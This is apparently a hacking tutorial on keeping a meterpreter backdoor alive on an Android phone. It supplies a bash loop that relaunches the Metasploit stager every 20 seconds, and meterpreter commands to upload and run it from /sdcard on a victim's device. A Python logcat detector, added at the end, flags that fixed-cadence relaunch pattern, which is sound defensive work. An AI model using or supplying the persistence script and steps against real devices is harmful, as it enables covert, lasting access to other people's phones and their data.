Backdoor In Android Using Kali Linux With A Shell Script



We’re going to show you how hackers can create a persistent backdoor in Android using Kali Linux after hacking with msfvenom.

You can use any of the methods above to hack the Android device, but once you get the meterpreter session, that session is not persistent. To make it persistent, you need to upload one shell script into any location of the /sdcard directory.

Generally, your victim’s device is not rooted, so you can’t create any file in the /etc/init.d directory due to insufficient permissions. We are therefore using another method: upload a backdoor script to the /sdcard directory using a shell command, then execute the script, which automatically makes a persistent backdoor on that Android device.

The first required part is to get the meterpreter session. There are a lot of methods to build a backdoor .apk file, like using TheFatRat, msfvenom, spade, etc. You can use any of the methods and get the meterpreter session.

As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:

#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

And save it as anyname.sh

Here’s the updated version of the above shell script, which is 100% compatible with all Android versions:

#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

After that, you need to get into the root directory of the Android device by typing “cd /” in the terminal.

Now you need to get into the /sdcard location by typing “cd /sdcard” in the same terminal.

Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in the same terminal.

Now all we have to do is execute the script once, and then everything will be done automatically. Type “shell” to enter the system’s shell mode on the Android device.

Here you need to go into the same location again, i.e. cd /root/sdcard, and execute the backdoor using “sh yeahhub-backdoor.sh”.

Your script has been executed successfully. You can terminate the execution by pressing CTRL + C and then typing Y.

You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in the above screen.

The persistence of the backdoor will only remain until a reboot of the Android system. If your victim is in the same network, i.e. LAN, then the persistence will remain forever on LAN, and if you have a static IP, then your persistence will remain forever on WAN too.
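
From the defender's side, the loop described above leaves a recognizable trace: the same activity component is started again and again at a fixed 20-second cadence. The following added example (not part of the original article) flags that pattern in logcat output. The `ActivityTaskManager: START` line layout, the threshold parameters and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample lines in logcat `threadtime` layout (not captured from a device).
_FMT = ("01-10 {} 1200 1300 I ActivityTaskManager: START u0 "
        "{{act=android.intent.action.MAIN cmp={}}} from uid {}")
SAMPLE_LOG = "\n".join(
    [_FMT.format(t, "com.metasploit.stage/.MainActivity", 10155)
     for t in ("12:00:00.100", "12:00:20.300", "12:00:40.200",
               "12:01:00.400", "12:01:20.350")] +
    [_FMT.format(t, "com.example.mail/.Inbox", 10080)  # ordinary, irregular use
     for t in ("12:00:07.500", "12:00:09.000", "12:01:55.000", "12:03:30.000")])

# Timestamp, then an activity START record, then the launched component.
START_RE = re.compile(
    r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d{3}).*?"
    r"Activity(?:Task)?Manager: START u\d+ \{[^}]*cmp=([^\s}]+)")

def parse_starts(log):
    """Map each started component to the list of its start times."""
    starts = defaultdict(list)
    for line in log.splitlines():
        m = START_RE.match(line)
        if m:
            # threadtime omits the year; 2000 is an arbitrary leap-year filler.
            ts = datetime.strptime("2000-" + m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            starts[m.group(2)].append(ts)
    return starts

def periodic_relaunches(log, min_starts=4, max_jitter=2.0, max_period=120.0):
    """Return {component: mean gap in seconds} for fixed-cadence relaunches.

    A component is flagged when it was started at least `min_starts` times,
    the gaps between starts vary by at most `max_jitter` seconds (population
    standard deviation) and the mean gap is at most `max_period` seconds.
    """
    findings = {}
    for component, times in parse_starts(log).items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if (len(times) >= min_starts and pstdev(gaps) <= max_jitter
                and mean(gaps) <= max_period):
            findings[component] = round(mean(gaps), 1)
    return findings

if __name__ == "__main__":
    for component, gap in periodic_relaunches(SAMPLE_LOG).items():
        print(f"periodic relaunch: {component} every ~{gap}s")
```

Because the check keys on cadence rather than on the package name, it also catches a stager whose package has been renamed; a flagged component should then be compared against the device's installed-package list and any shell scripts found under /sdcard.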
